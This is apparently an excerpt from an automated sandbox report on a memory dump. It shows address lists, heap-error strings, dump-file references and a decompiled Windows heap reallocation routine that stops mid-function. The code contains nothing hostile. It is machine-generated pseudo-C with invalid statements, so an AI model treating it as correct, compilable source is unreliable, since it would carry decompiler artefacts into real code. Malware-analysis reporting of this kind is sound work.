                                                0x00904567
                                                0x00904569
                                                0x00000000
                                                0x00000000
                                                0x00904572
                                                0x00904575
                                                0x0090457b
                                                0x0090457d
                                                0x0090464b
                                                0x0090464b
                                                0x0090464e
                                                0x00904651
                                                0x00904653
                                                0x00904656
                                                0x00904656
                                                0x00904659
                                                0x0090465c
                                                0x0090465f
                                                0x00000000
                                                0x00000000
                                                0x00904669
                                                0x0090466e
                                                0x00904670
                                                0x00000000
                                                0x00000000
                                                0x0095ab9c
                                                0x0095abc6
                                                0x0095abc6
                                                0x00000000
                                                0x0095abc6
                                                0x00904583
                                                0x00904586
                                                0x00904586
                                                0x0090458c
                                                0x0090458f
                                                0x00904591
                                                0x00000000
                                                0x00000000
                                                0x00904788
                                                0x0090478a
                                                0x0090478c
                                                0x0095ab8c
                                                0x0090459a
                                                0x0090459d
                                                0x009045a0
                                                0x009045a3
                                                0x009045a7
                                                0x009045a9
                                                0x009045a9
                                                0x009045a9
                                                0x009045ad
                                                0x009045b0
                                                0x009045b6
                                                0x009045ba
                                                0x009045bd
                                                0x009045c4
                                                0x009045c7
                                                0x00934f91
                                                0x00934f91
                                                0x009045cd
                                                0x009045d0
                                                0x009045d3
                                                0x00000000
                                                0x009045d5
                                                0x009045d8
                                                0x009045db
                                                0x009045de
                                                0x00904275
                                                0x00904275
                                                0x009045e7
                                                0x009045ea
                                                0x0095aba3
                                                0x0095aba6
                                                0x0095aba9
                                                0x0095abb2
                                                0x00000000
                                                0x0095abb2
                                                0x0095abab
                                                0x00000000
                                                0x009045f0
                                                0x009045f0
                                                0x009045f3
                                                0x009045f6
                                                0x00904627
                                                0x00904627
                                                0x0090462a
                                                0x0090462d
                                                0x0090462d
                                                0x0090462d
                                                0x00904631
                                                0x00904631
                                                0x00904636
                                                0x00904644
                                                0x00904649
                                                0x00904649
                                                0x00000000
                                                0x00904649
                                                0x009045f8
                                                0x009045fc
                                                0x009445af
                                                0x00904602
                                                0x00904602
                                                0x00904605
                                                0x00904608
                                                0x0090460b
                                                0x0090460d
                                                0x0090460d
                                                0x00904610
                                                0x00904610
                                                0x00904613
                                                0x00904616
                                                0x00904616
                                                0x0090461f
                                                0x0090461f
                                                0x00904621
                                                0x00904343
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00904621
                                                0x009045ea
                                                0x009045d3
                                                0x00904792
                                                0x00904792
                                                0x00904597
                                                0x00000000
                                                0x00904597
                                                0x00904561
                                                0x00000000
                                                0x00903137
                                                0x009030c8
                                                0x009030c8
                                                0x009030d7
                                                0x0091ecfd
                                                0x0091ecff
                                                0x0095ab4c
                                                0x0095ab51
                                                0x0095ab58
                                                0x0095ab65
                                                0x0095ab6b
                                                0x009033e5
                                                0x009033e5
                                                0x009033ec
                                                0x009033f1
                                                0x009033f8
                                                0x0095af54
                                                0x0095af57
                                                0x0095af59
                                                0x0095af5f
                                                0x0095af63
                                                0x0095af71
                                                0x0095af71
                                                0x0095af63
                                                0x0095af59
                                                0x009033fe
                                                0x00903401
                                                0x00903406
                                                0x00903406
                                                0x0091ed05
                                                0x0091ed0e
                                                0x0091ed15
                                                0x0091ed18
                                                0x00000000
                                                0x009030dd
                                                0x009030dd
                                                0x009030e3
                                                0x009030ea
                                                0x0091319c
                                                0x0091319c
                                                0x009030f0
                                                0x009030f4
                                                0x00000000
                                                0x009030f4
                                                0x009030d7
                                                0x009030c6

                                                Strings
                                                • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 0095ACD9
                                                • HEAP: , xrefs: 0095ACC2
                                                • HEAP[%wZ]: , xrefs: 0095ACB5
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-2419525547
                                                • Opcode ID: 80ccb603cff2c415bac87ee7868d2750da2b6606e1e961b5f20e1429ad8f92a1
                                                • Instruction ID: ab5f15cbeff75501e48ee1e9d7ee557cf633ef9f929471537cf26a10e81d5573
                                                • Opcode Fuzzy Hash: 80ccb603cff2c415bac87ee7868d2750da2b6606e1e961b5f20e1429ad8f92a1
                                                • Instruction Fuzzy Hash: 3BA2BF70A04215DFDB28CF69C480BB9BBBAFF48301F14859EE8969B295D734AD80DF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090C85C, Relevance: 4.6, Strings: 3, Instructions: 858COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 91%
                                                			E0090C85C(signed int __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t415;
				signed int _t423;
				signed int _t431;
				intOrPtr _t436;
				void* _t440;

				_t432 = __ecx;
				_t431 = __ebx;
				_push(0xe4);
				_push(0x8fce60);
				E008FDF5C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t440 - 0x1c)) = __edx;
				_t436 = __ecx;
				 *((intOrPtr*)(_t440 - 0x4c)) = __ecx;
				 *((intOrPtr*)(_t440 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t440 - 0x40)) = 0;
				 *((char*)(_t440 - 0x21)) = 0;
				 *((intOrPtr*)(_t440 - 0x5c)) = 0;
				_t439 =  *((intOrPtr*)(_t440 + 8));
				if( *((intOrPtr*)(_t440 + 8)) == 0) {
					 *( *[fs:0x18] + 0xbf4) = 0;
					_push(0);
					 *( *[fs:0x18] + 0x34) = E0090641D(__eflags);
					goto L105;
				} else {
					__ebx = __esi - 8;
					__eax = __ebx;
					__eflags =  *((char*)(__ebx + 7)) - 5;
					if( *((char*)(__ebx + 7)) == 5) {
						 *(__ebx + 6) & 0x000000ff = ( *(__ebx + 6) & 0x000000ff) << 3;
						__eax = __eax - (( *(__ebx + 6) & 0x000000ff) << 3);
					}
					 *(__ebp - 0x28) = __eax;
					__eflags =  *((char*)(__edi + 0xda)) - 2;
					if( *((char*)(__edi + 0xda)) != 2) {
						__ecx = 0;
					} else {
						__ecx =  *(__edi + 0xd4);
					}
					__eflags = __ecx - __edx;
					if(__ecx == __edx) {
						L23:
						__eax =  *(__ebp - 0x1c);
						__eax =  *(__ebp - 0x1c) |  *(__edi + 0x44);
						 *(__ebp - 0x1c) = __eax;
						__eflags = __eax & 0x61000000;
						if((__eax & 0x61000000) != 0) {
							__eflags = __eax & 0x10000000;
							if(__eflags != 0) {
								goto L24;
							}
							__eax = E009A1238(__ebx, __edx, __edi, __esi, __eflags, __edi, __eax, __esi,  *(__ebp + 0xc));
							L22:
							return E008FDFA1(_t415);
						}
						L24:
						__ecx =  *(__ebp + 0xc);
						__eflags = __ecx - 0x7fffffff;
						if(__eflags > 0) {
							__ecx =  *[fs:0x18];
							__eax = 0xc0000017;
							 *( *[fs:0x18] + 0xbf4) = 0xc0000017;
							__esi =  *[fs:0x18];
							_push(0xc0000017);
							__eax = E0090641D(__eflags);
							 *( *[fs:0x18] + 0x34) = __eax;
							L105:
							_t415 = 0;
							goto L22;
						}
						__eflags = __ecx - __edx;
						if(__ecx == __edx) {
							__ecx = 0;
							__ecx = 1;
						}
						 *(__edi + 0x98) =  *(__edi + 0x98) + __ecx;
						__eax =  *(__edi + 0x98) + __ecx &  *(__edi + 0x9c);
						 *(__ebp - 0x2c) =  *(__edi + 0x98) + __ecx &  *(__edi + 0x9c);
						 *(__ebp - 4) = __edx;
						__eflags =  *(__ebp - 0x1c) & 0x00000001;
						if(__eflags != 0) {
							L30:
							 *(__ebp - 4) = 1;
							__eflags =  *((char*)(__ebx + 7)) - 5;
							if( *((char*)(__ebx + 7)) == 5) {
								 *(__ebx + 6) & 0x000000ff = ( *(__ebx + 6) & 0x000000ff) << 3;
								__ebx = __ebx - (( *(__ebx + 6) & 0x000000ff) << 3);
							}
							__esi = __ebx;
							 *(__ebp - 0x28) = __esi;
							__eflags =  *(__edi + 0x4c);
							if( *(__edi + 0x4c) != 0) {
								__eax =  *(__edi + 0x50);
								 *__esi =  *__esi ^  *(__edi + 0x50);
								 *(__esi + 2) =  *(__esi + 2) ^  *(__esi + 1);
								__al =  *(__esi + 2) ^  *(__esi + 1) ^  *__esi;
								__eflags =  *(__esi + 3) - __al;
								if(__eflags != 0) {
									_push(0);
									_push(__esi);
									_push(__edi);
									__eax = E0099F8EE(__ebx, __edi, __esi, __eflags);
								}
							}
							 *(__ebp - 0x40) = __esi;
							__eax =  *__esi & 0x0000ffff;
							__edi =  *(__edi + 0xb8);
							__edx = 0;
							__eflags = 0;
							while(1) {
								 *(__ebp - 0x70) = __edi;
								__ecx =  *(__edi + 4);
								__eflags = __eax - __ecx;
								if(__eax < __ecx) {
									break;
								}
								__ebx =  *__edi;
								__eflags = __ebx - __edx;
								if(__ebx == __edx) {
									_t209 = __ecx - 1; // -1
									__eax = _t209;
									break;
								}
								__edi = __ebx;
							}
							__ecx = __ecx - 1;
							__eflags = __eax - __ecx;
							if(__eax >= __ecx) {
								__eflags =  *__edi - __edx;
								if( *__edi != __edx) {
									__eflags = __eax - __ecx;
									if(__eax == __ecx) {
										goto L36;
									}
								}
								__eax = 0;
								L39:
								__eflags = __eax - __edx;
								if(__eax != __edx) {
									__ecx =  *(__eax + 4);
									__eflags = __cl & 0x00000001;
									if((__cl & 0x00000001) == 0) {
										__eflags = __ecx - 2;
										if(__ecx >= 2) {
											_t77 = __eax + 4;
											 *_t77 =  *(__eax + 4) + 0xfffffffe;
											__eflags =  *_t77;
										}
									}
								}
								__edi =  *(__ebp - 0x20);
								__eflags =  *(__ebp - 0x1c) & 0x3c000100;
								if(( *(__ebp - 0x1c) & 0x3c000100) != 0) {
									L106:
									 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 8;
									L46:
									__eax = __esi + 7;
									 *(__ebp - 0x3c) = __eax;
									__cl =  *__eax;
									__eax = __cl & 0x000000ff;
									__eflags = __eax & 0xffffff3f;
									if(__eflags == 0) {
										__ecx =  *[fs:0x18];
										__eax = 0xc000000d;
										 *( *[fs:0x18] + 0xbf4) = 0xc000000d;
										__esi =  *[fs:0x18];
										_push(0xc000000d);
										 *( *[fs:0x18] + 0x34) = E0090641D(__eflags);
										L56:
										_t103 = __ebp - 4;
										 *_t103 =  *(__ebp - 4) & 0x00000000;
										__eflags =  *_t103;
										goto L57;
									}
									__eflags = __cl - 4;
									if(__cl == 4) {
										__edi = E00985766( *(__ebp - 0x20), __esi);
										 *(__ebp - 0x38) = __edi;
										 *__esi & 0x0000ffff = ( *__esi & 0x0000ffff) + __edi;
										__eax = ( *__esi & 0x0000ffff) + __edi >> 3;
										 *(__ebp - 0x30) = ( *__esi & 0x0000ffff) + __edi >> 3;
										 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 0x18;
										__eax =  *(__ebp - 0x2c);
										 *(__ebp - 0x2c) = __eax;
										__eax = __eax + 0xfff;
										 *(__ebp - 0x2c) = __eax;
										L53:
										__ebx =  *(__ebp - 0x2c);
										__ebx =  *(__ebp - 0x2c) >> 3;
										 *(__ebp - 0x68) = __ebx;
										__eflags = __ebx -  *(__ebp - 0x30);
										if(__ebx <=  *(__ebp - 0x30)) {
											__eax = __ebx + 1;
											__eflags = __eax -  *(__ebp - 0x30);
											if(__eax ==  *(__ebp - 0x30)) {
												__ebx = __eax;
												 *(__ebp - 0x68) = __ebx;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 8;
											}
											__eax =  *(__ebp - 0x3c);
											__eflags =  *( *(__ebp - 0x3c)) - 4;
											if( *( *(__ebp - 0x3c)) == 4) {
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) -  *(__ebp + 0xc);
												 *__esi = __ax;
											} else {
												__eflags =  *(__esi + 2) & 0x00000002;
												if(( *(__esi + 2) & 0x00000002) != 0) {
													__eax =  *__esi & 0x0000ffff;
													__eax = __esi + ( *__esi & 0x0000ffff) * 8 - 8;
													__edi = __esi + __ebx * 8 - 8;
													 *(__ebp - 0x44) = __edi;
													__ecx =  *__eax;
													 *__edi =  *__eax;
													 *(__edi + 4) = __eax;
													__eax = E00908131();
													__eflags = __eax & 0x00000800;
													if((__eax & 0x00000800) != 0) {
														 *(__edi + 2) & 0x0000ffff = E0098E3A7( *(__ebp - 0x20),  *(__edi + 2) & 0x0000ffff,  *(__ebp - 0x30), __ebx, 4);
														 *(__edi + 2) = __ax;
													}
													__edi =  *(__ebp - 0x38);
												} else {
													__eax = E00908131();
													__eflags = __eax & 0x00000800;
													if((__eax & 0x00000800) != 0) {
														__al =  *(__esi + 3);
														__ecx =  *__esi & 0x0000ffff;
														__ax = __al & 0x000000ff;
														__ax & 0x0000ffff = E0098E3A7( *(__ebp - 0x20), __ax & 0x0000ffff,  *__esi & 0x0000ffff, __ebx, 4);
														 *(__esi + 3) = __al;
													}
												}
											}
											__ecx =  *(__ebp + 0xc);
											__eflags = __ecx - __edi;
											if(__ecx > __edi) {
												__eflags =  *(__ebp - 0x1c) & 0x00000008;
												if(( *(__ebp - 0x1c) & 0x00000008) != 0) {
													__ecx = __ecx - __edi;
													__eax =  *(__ebp + 8);
													__eax = E008FDFC0(__edi, 0, __ecx - __edi);
												} else {
													__eax =  *(__ebp - 0x20);
													__eflags =  *(__eax + 0x40) & 0x00000040;
													if(( *(__eax + 0x40) & 0x00000040) != 0) {
														__eax = __edi;
														__eax = __edi & 0x00000003;
														__eflags = __eax;
														 *(__ebp - 0x6c) = __eax;
														if(__eax != 0) {
															__edx = 4;
															__edx = __edx - __eax;
															__eflags = __edx;
															__eax = __edx;
															 *(__ebp - 0x6c) = __eax;
														}
														__edx = __eax + __edi;
														__eflags = __ecx - __edx;
														if(__ecx > __edx) {
															__ecx = __ecx - __eax;
															__ecx = __ecx - __edi;
															__ecx = __ecx & 0xfffffffc;
															__eflags = __ecx;
															if(__ecx != 0) {
																_t338 = __esi + 8; // 0xc
																__edx + _t338 = E009289F0(__edx + _t338, __ecx, 0xbaadf00d);
															}
														}
													}
												}
											}
											__eax =  *(__ebp - 0x20);
											__eflags =  *(__eax + 0x40) & 0x00000020;
											if(( *(__eax + 0x40) & 0x00000020) != 0) {
												__eax = 0xabababab;
												__ecx =  *(__ebp + 0xc);
												__edi = __esi +  *(__ebp + 0xc) + 8;
												asm("stosd");
												asm("stosd");
											}
											__eflags = __ebx -  *(__ebp - 0x30);
											if(__ebx !=  *(__ebp - 0x30)) {
												__al =  *(__esi + 2);
												__al =  *(__esi + 2) & 0x000000fe;
												 *(__ebp - 0x60) = __al;
												__eax =  *(__ebp - 0x3c);
												__eflags =  *( *(__ebp - 0x3c)) - 4;
												if( *( *(__ebp - 0x3c)) == 4) {
													__eflags = E00908131() & 0x00000800;
													if(__eflags != 0) {
														 *(__esi - 0xe) & 0x0000ffff = E0098E3A7( *(__ebp - 0x20),  *(__esi - 0xe) & 0x0000ffff,  *(__ebp - 0x30), __ebx, 5);
														 *(__esi - 0xe) = __ax;
													}
													__eax =  *(__ebp - 0x2c);
													__ecx = __esi + __eax - 0x18;
													 *(__ebp - 0x50) = __esi + __eax - 0x18;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) << 3;
													__ecx = ( *(__ebp - 0x30) << 3) - __eax;
													 *(__ebp - 0x48) = ( *(__ebp - 0x30) << 3) - __eax;
													__ebp - 0x48 = __ebp - 0x50;
													__eax = E00904167(__edx, __eflags, 0xffffffff, __ebp - 0x50, __ebp - 0x48, 0x4000);
													 *(__ebp - 0x64) = __eax;
													__eflags = __eax;
													if(__eax >= 0) {
														__eax =  *(__ebp - 0x48);
														 *(__esi - 8) =  *(__esi - 8) -  *(__ebp - 0x48);
													} else {
														__eax =  *[fs:0x18];
														__eax =  *( *[fs:0x18] + 0x30);
														__eflags =  *(__eax + 0xc);
														if( *(__eax + 0xc) == 0) {
															_push("HEAP: ");
															__eax = E0094373B();
														} else {
															 *[fs:0x18] =  *( *[fs:0x18] + 0x30);
															 *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc));
															 *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c = E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
															_pop(__ecx);
														}
														_pop(__ecx);
														_push( *(__ebp - 0x64));
														_push( *(__ebp - 0x48));
														E0094373B("Unable to release memory at %p for %p bytes - Status == %x\n",  *(__ebp - 0x50)) = E009A06F9(0);
														__esi =  *(__ebp - 0x28);
													}
												} else {
													__eax =  *__esi & 0x0000ffff;
													__ecx = __bx & 0x0000ffff;
													__eax = ( *__esi & 0x0000ffff) - (__bx & 0x0000ffff);
													 *__esi = __bx;
													__cl =  *((intOrPtr*)(__esi + 6));
													__eflags = __cl;
													if(__cl == 0) {
														__edx =  *(__ebp - 0x20);
													} else {
														__cl & 0x000000ff = (__cl & 0x000000ff) << 0x10;
														__esi = __esi & 0xffff0000;
														__edx = (__esi & 0xffff0000) - ((__cl & 0x000000ff) << 0x10);
														__edx = (__esi & 0xffff0000) - ((__cl & 0x000000ff) << 0x10) + 0x10000;
														__eflags = __edx;
													}
													__edi =  *(__ebp - 0x20);
													 *(__edi + 0x40) =  *(__edi + 0x40) >> 6;
													__al & 0x000000ff = __esi + __ebx * 8;
													__ecx = __edi;
													__eax = E0090351F(__edi, __edx, __esi + __ebx * 8,  *(__ebp - 0x60), __al & 0x000000ff, __ebx, __esi + __ebx * 8);
												}
											}
											__eax =  *(__ebp - 0x3c);
											__cl =  *( *(__ebp - 0x3c));
											__eflags = __cl - 4;
											if(__cl != 4) {
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) -  *(__ebp + 0xc);
												__edx =  *(__ebp - 0x2c) -  *(__ebp + 0xc);
												 *(__ebp - 0x74) = __edx;
												__eflags = __edx - 0x3f;
												if(__edx >= 0x3f) {
													__eflags = __cl;
													if(__cl >= 0) {
														__eax =  *(__ebp - 0x20);
														__eflags =  *(__eax + 0x4c);
														if( *(__eax + 0x4c) == 0) {
															__eax =  *__esi & 0x0000ffff;
															L182:
															__eax = __ax & 0x0000ffff;
															__esi = __esi + (__ax & 0x0000ffff) * 8 - 4;
															__eax =  *(__ebp - 0x3c);
															 *( *(__ebp - 0x3c)) = 0x3f;
															 *__esi = __edx;
															goto L56;
														}
														__esi =  *__esi;
														 *(__ebp - 0x7c) = __esi;
														__eflags =  *(__eax + 0x4c) & __esi;
														if(( *(__eax + 0x4c) & __esi) != 0) {
															__esi = __esi ^  *(__eax + 0x50);
															__eflags = __esi;
															 *(__ebp - 0x7c) = __esi;
														}
														__eax = __si & 0x0000ffff;
														L180:
														__esi =  *(__ebp - 0x28);
														goto L182;
													}
													__eax = __esi;
													__eax = __esi >> 3;
													__esi =  *__esi;
													__esi = __esi ^ __eax;
													__esi = __esi ^  *0x9d00a4;
													__ax =  *((intOrPtr*)(__esi + 0x10));
													goto L180;
												}
												__eax =  *(__ebp - 0x3c);
												 *( *(__ebp - 0x3c)) = __dl;
											}
											goto L56;
										}
										__eax =  *(__ebp - 0x3c);
										__eflags =  *( *(__ebp - 0x3c)) - 4;
										if( *( *(__ebp - 0x3c)) == 4) {
											L72:
											__eflags =  *(__ebp - 0x1c) & 0x00000010;
											if(( *(__ebp - 0x1c) & 0x00000010) != 0) {
												 *(__ebp + 8) =  *(__ebp + 8) & 0x00000000;
												goto L56;
											}
											 *(__ebp - 0x1c) =  *(__ebp - 0x1c) & 0xc003ffff;
											__al =  *(__esi + 2);
											__eflags = __al & 0x00000002;
											if((__al & 0x00000002) != 0) {
												 *(__ebp - 0x1c) =  *(__ebp - 0x1c) & 0xfffff1ff;
												__al & 0x000000ff = __al & 0xe0;
												__al & 0xe0 | 0x00000010 = (__al & 0xe0 | 0x00000010) << 4;
												 *(__ebp - 0x1c) =  *(__ebp - 0x1c) | (__al & 0xe0 | 0x00000010) << 0x00000004;
												 *(__ebp - 4) = 2;
												__eax = E00922568(__esi);
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __ax;
												if(__ax != 0) {
													__eflags = __eax & 0x00008000;
													if((__eax & 0x00008000) == 0) {
														__ax & 0x0000ffff = (__ax & 0x0000ffff) << 0x12;
														 *(__ebp - 0x1c) =  *(__ebp - 0x1c) | (__ax & 0x0000ffff) << 0x00000012;
													}
												}
												 *(__ebp - 4) = 1;
											} else {
												__eax = E00908131();
												__eflags = __eax & 0x00000800;
												if((__eax & 0x00000800) != 0) {
													__al =  *(__esi + 3);
													__eflags = __al;
													if(__al != 0) {
														__al & 0x000000ff = (__al & 0x000000ff) << 0x12;
														 *(__ebp - 0x1c) =  *(__ebp - 0x1c) | (__al & 0x000000ff) << 0x00000012;
													}
												}
											}
											__eax =  *(__ebp - 0x20);
											__eflags =  *(__eax + 0x4c);
											if( *(__eax + 0x4c) != 0) {
												__ecx =  *(__esi + 1) & 0x000000ff;
												__edx =  *__esi & 0x000000ff;
												__ecx =  *(__esi + 1) & 0x000000ff ^  *__esi & 0x000000ff;
												__edx =  *(__esi + 2) & 0x000000ff;
												__ecx =  *(__esi + 1) & 0x000000ff ^  *__esi & 0x000000ff ^  *(__esi + 2) & 0x000000ff;
												 *(__esi + 3) = __cl;
												 *__esi =  *__esi ^ __eax;
												__eflags =  *__esi;
											}
											 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
											 *(__ebp - 4) = 3;
											 *(__ebp - 0x1c) =  *(__ebp - 0x1c) & 0xfffffff7;
											 *(__ebp - 0x34) = E008FE0C6( *(__ebp - 0x4c),  *(__ebp - 0x1c) & 0xfffffff7,  *(__ebp + 0xc));
											 *(__ebp - 4) = 1;
											__ebx =  *(__ebp - 0x34);
											__eflags = __ebx;
											if(__ebx == 0) {
												L92:
												__eax =  *(__ebp + 8);
												 *(__ebp - 0x5c) =  *(__ebp + 8);
												__eax =  *(__ebp - 0x34);
												 *(__ebp + 8) =  *(__ebp - 0x34);
												goto L56;
											} else {
												__ebx = __ebx + 0xfffffff8;
												__eflags =  *((char*)(__ebx + 7)) - 5;
												if( *((char*)(__ebx + 7)) == 5) {
													 *(__ebx + 6) & 0x000000ff = ( *(__ebx + 6) & 0x000000ff) << 3;
													__ebx = __ebx - (( *(__ebx + 6) & 0x000000ff) << 3);
												}
												 *(__ebp - 0x58) = __ebx;
												__edi =  *(__ebp - 0x20);
												__eflags =  *(__edi + 0x4c);
												if( *(__edi + 0x4c) != 0) {
													__eax =  *(__edi + 0x50);
													 *__ebx =  *__ebx ^  *(__edi + 0x50);
													 *(__ebx + 2) =  *(__ebx + 2) ^  *(__ebx + 1);
													__al =  *(__ebx + 2) ^  *(__ebx + 1) ^  *__ebx;
													__eflags =  *(__ebx + 3) - __al;
													if(__eflags != 0) {
														_push(0);
														_push(__ebx);
														_push(__edi);
														__eax = E0099F8EE(__ebx, __edi, __esi, __eflags);
													}
												}
												 *(__ebp - 0x40) = __ebx;
												__eflags =  *(__ebx + 2) & 0x00000002;
												if(( *(__ebx + 2) & 0x00000002) != 0) {
													 *(__ebp - 0x44) = E00922568(__ebx);
													__eflags =  *(__edi + 0x4c);
													if( *(__edi + 0x4c) != 0) {
														__eax =  *(__edi + 0x50);
														 *__esi =  *__esi ^  *(__edi + 0x50);
														 *(__esi + 2) =  *(__esi + 2) ^  *(__esi + 1);
														__al =  *(__esi + 2) ^  *(__esi + 1) ^  *__esi;
														__eflags =  *(__esi + 3) - __al;
														if(__eflags != 0) {
															_push(0);
															_push(__esi);
															_push(__edi);
															__eax = E0099F8EE(__ebx, __edi, __esi, __eflags);
														}
													}
													 *(__ebp - 4) = 4;
													__eflags =  *(__esi + 2) & 0x00000002;
													if(( *(__esi + 2) & 0x00000002) == 0) {
														__eax = 0;
														__edi =  *(__ebp - 0x44);
														asm("stosd");
														asm("stosd");
														__edi =  *(__ebp - 0x20);
													} else {
														__eax = E00922568(__esi);
														__eax =  *(__eax + 4);
														__ecx =  *(__ebp - 0x44);
														 *( *(__ebp - 0x44) + 4) = __eax;
													}
													 *(__ebp - 4) = 1;
													__eflags =  *(__edi + 0x4c);
													if( *(__edi + 0x4c) == 0) {
														goto L84;
													} else {
														__eax =  *(__esi + 2) & 0x000000ff;
														__ecx =  *(__esi + 1) & 0x000000ff;
														__eax =  *(__esi + 2) & 0x000000ff ^  *(__esi + 1) & 0x000000ff;
														__ecx =  *__esi & 0x000000ff;
														__eax =  *(__esi + 2) & 0x000000ff ^  *(__esi + 1) & 0x000000ff ^  *__esi & 0x000000ff;
														 *(__esi + 3) = __al;
														__eax =  *(__edi + 0x50);
														 *__esi =  *__esi ^  *(__edi + 0x50);
														goto L82;
													}
												} else {
													L82:
													__eflags =  *(__edi + 0x4c);
													if( *(__edi + 0x4c) != 0) {
														__eax =  *(__ebx + 2) & 0x000000ff;
														__ecx =  *(__ebx + 1) & 0x000000ff;
														__eax =  *(__ebx + 2) & 0x000000ff ^  *(__ebx + 1) & 0x000000ff;
														__ecx =  *__ebx & 0x000000ff;
														__eax =  *(__ebx + 2) & 0x000000ff ^  *(__ebx + 1) & 0x000000ff ^  *__ebx & 0x000000ff;
														 *(__ebx + 3) = __al;
														__eax =  *(__edi + 0x50);
														 *__ebx =  *__ebx ^  *(__edi + 0x50);
														__eflags =  *__ebx;
													}
													L84:
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													__eflags =  *((char*)(__ebp - 0x21));
													if( *((char*)(__ebp - 0x21)) != 0) {
														__eax = E008F2290( *(__edi + 0xcc));
														 *((char*)(__ebp - 0x21)) = 0;
														_t183 = __ebp - 0x1c;
														 *_t183 =  *(__ebp - 0x1c) & 0xfffffffe;
														__eflags =  *_t183;
													}
													__ebx =  *(__ebp + 0xc);
													__esi =  *(__ebp - 0x38);
													__eflags = __ebx - __esi;
													__eax = __ebx;
													if(__ebx >= __esi) {
														__eax = __esi;
													}
													__edi =  *(__ebp - 0x34);
													__eax = E008F2340(__edi,  *(__ebp + 8), __eax);
													__eflags = __ebx - __esi;
													if(__ebx > __esi) {
														__eflags =  *(__ebp - 0x1c) & 0x00000008;
														if(( *(__ebp - 0x1c) & 0x00000008) != 0) {
															__ebx = __ebx - __esi;
															__eflags = __edi;
															__eax = E008FDFC0(__edi, 0, __ebx);
														}
													}
													__eax = E008FE025(__ecx,  *(__ebp - 0x4c),  *(__ebp - 0x1c),  *(__ebp + 8));
													goto L92;
												}
											}
										}
										__eax = E0090CD5B( *(__ebp - 0x20),  *(__ebp - 0x1c), __esi,  *(__ebp + 0xc), __ebx);
										__eflags = __al;
										if(__al == 0) {
											goto L72;
										}
										goto L56;
									}
									__edx =  *__esi & 0x0000ffff;
									__ebx = __dx & 0x0000ffff;
									 *(__ebp - 0x30) = __dx & 0x0000ffff;
									__eflags = __cl - 5;
									if(__cl == 5) {
										__eax =  *(__esi + 4) & 0x0000ffff;
										__ecx =  *(__edi + 0x54) & 0x0000ffff;
										__eax =  *(__esi + 4) & 0x0000ffff ^  *(__edi + 0x54) & 0x0000ffff;
										L52:
										 *(__ebp - 0x30) =  *(__ebp - 0x30) << 3;
										__edi = ( *(__ebp - 0x30) << 3) - __eax;
										__eflags = __edi;
										 *(__ebp - 0x38) = __edi;
										goto L53;
									}
									__eflags = __cl & 0x00000040;
									if((__cl & 0x00000040) != 0) {
										__eax = __eax & 0x0000003f;
										__eax = __esi + __eax * 8;
										__eax =  *(__eax + 4) & 0x0000ffff;
										goto L52;
									}
									__eflags = (__cl & 0x0000003f) - 0x3f;
									if((__cl & 0x0000003f) == 0x3f) {
										__eflags = __cl;
										if(__cl >= 0) {
											__eflags =  *(__edi + 0x4c);
											if( *(__edi + 0x4c) == 0) {
												__eax = __dx & 0x0000ffff;
												L156:
												_t323 = (__ax & 0x0000ffff) * 8; // 0x0
												__eax = __esi + _t323 - 4;
												__eax =  *(__esi + _t323 - 4);
												goto L52;
											}
											__esi =  *__esi;
											 *(__ebp - 0x84) = __esi;
											__eflags =  *(__edi + 0x4c) & __esi;
											if(( *(__edi + 0x4c) & __esi) != 0) {
												__esi = __esi ^  *(__edi + 0x50);
												__eflags = __esi;
												 *(__ebp - 0x84) = __esi;
											}
											__eax = __si & 0x0000ffff;
											L154:
											__esi =  *(__ebp - 0x28);
											goto L156;
										}
										__eax = __esi;
										__eax = __esi >> 3;
										__esi =  *__esi;
										__esi = __esi ^ __eax;
										__esi = __esi ^  *0x9d00a4;
										__ax =  *((intOrPtr*)(__esi + 0x10));
										goto L154;
									} else {
										__eax = __eax & 0x0000003f;
										__eflags = __eax;
										goto L52;
									}
								}
								__eflags =  *((intOrPtr*)(__edi + 0xc0)) - __edx;
								if( *((intOrPtr*)(__edi + 0xc0)) != __edx) {
									goto L106;
								}
								__eflags =  *(__esi + 2) & 0x00000002;
								if(( *(__esi + 2) & 0x00000002) != 0) {
									goto L106;
								}
								goto L46;
							}
							L36:
